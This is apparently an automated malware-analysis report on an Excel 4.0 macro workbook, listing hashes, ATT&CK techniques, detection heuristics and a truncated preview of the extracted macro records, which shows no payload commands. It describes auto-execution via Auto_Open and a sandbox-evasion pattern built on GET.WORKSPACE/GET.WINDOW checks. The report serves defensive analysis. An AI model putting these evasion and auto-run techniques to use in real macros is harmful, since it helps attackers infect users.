Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8ae076bf7be3271f…

MALICIOUS

Office (OLE)

253.0 KB Created: 2020-08-05 15:37:08 Authoring application: Microsoft Excel First seen: 2020-09-07
MD5: 33f63e0b39761740aaec2ef868be007a SHA-1: bfc554d0644ca2b877235dfeba3ebe007e9a12fd SHA-256: 8ae076bf7be3271f403e668ff6e613ff59a0078fe18717ec4030665d65ff91f9
180 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is an Excel 4.0 macro-enabled workbook. Heuristics indicate the presence of an Auto_Open macro, which is designed to execute automatically when the workbook is opened. The document body contains social engineering text to prompt the user to enable editing and content, which would allow the macro to run. The macro uses dangerous functions and environment evasion techniques, suggesting it is designed to download and execute a second-stage payload.

Heuristics 4

  • Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • XLM Auto_Open environment-evasion HALT gate high OLE_XLM_ENVIRONMENT_EVASION_HALT
    Excel 4.0 macro sheet auto-executes multiple GET.WORKSPACE / GET.WINDOW environment checks and halts execution when the host does not match the expected user environment. This is a common sandbox-evasion pattern in XLM malware and is stronger than a bare XLM macro-sheet indicator.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 266932 bytes
SHA-256: 27fc223d78bfb8154773ca9e8b7df5a1f4f5897fa305447dda5fd49b7ff3071a
Preview script
First 1,000 lines of the extracted script
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  NC0
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgNameX  NAMEIDX 17 
' 0018     23 LABEL : Cell Value, String Constant - BOSFGfEZ len=0 
' 0018     27 LABEL : Cell Value, String Constant - CmCebntbGuVr len=0 
' 0018     23 LABEL : Cell Value, String Constant - CqUrvkcn len=0 
' 0018     27 LABEL : Cell Value, String Constant - EokdmdoLRXOG len=0 
' 0018     25 LABEL : Cell Value, String Constant - ExhLZSevcF len=0 
' 0018     22 LABEL : Cell Value, String Constant - fmCUftg len=0 
' 0018     20 LABEL : Cell Value, String Constant - iIqqb len=0 
' 0018     24 LABEL : Cell Value, String Constant - MkEMShyie len=0 
' 0018     25 LABEL : Cell Value, String Constant - OxASoANZrV len=0 
' 0018     26 LABEL : Cell Value, String Constant - PqHnioRJotA len=0 
' 0018     27 LABEL : Cell Value, String Constant - pqJHyRjETXlO len=0 
' 0018     25 LABEL : Cell Value, String Constant - rBPsytlZfr len=0 
' 0018     24 LABEL : Cell Value, String Constant - sJSrEfCcR len=0 
' 0018     21 LABEL : Cell Value, String Constant - vQiLGB len=0 
' 0018     21 LABEL : Cell Value, String Constant - VVLpBE len=0 
' 0018     27 LABEL : Cell Value, String Constant -       hidden len=7 ptgRef3d  Sheet!HK11832 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10
... (truncated)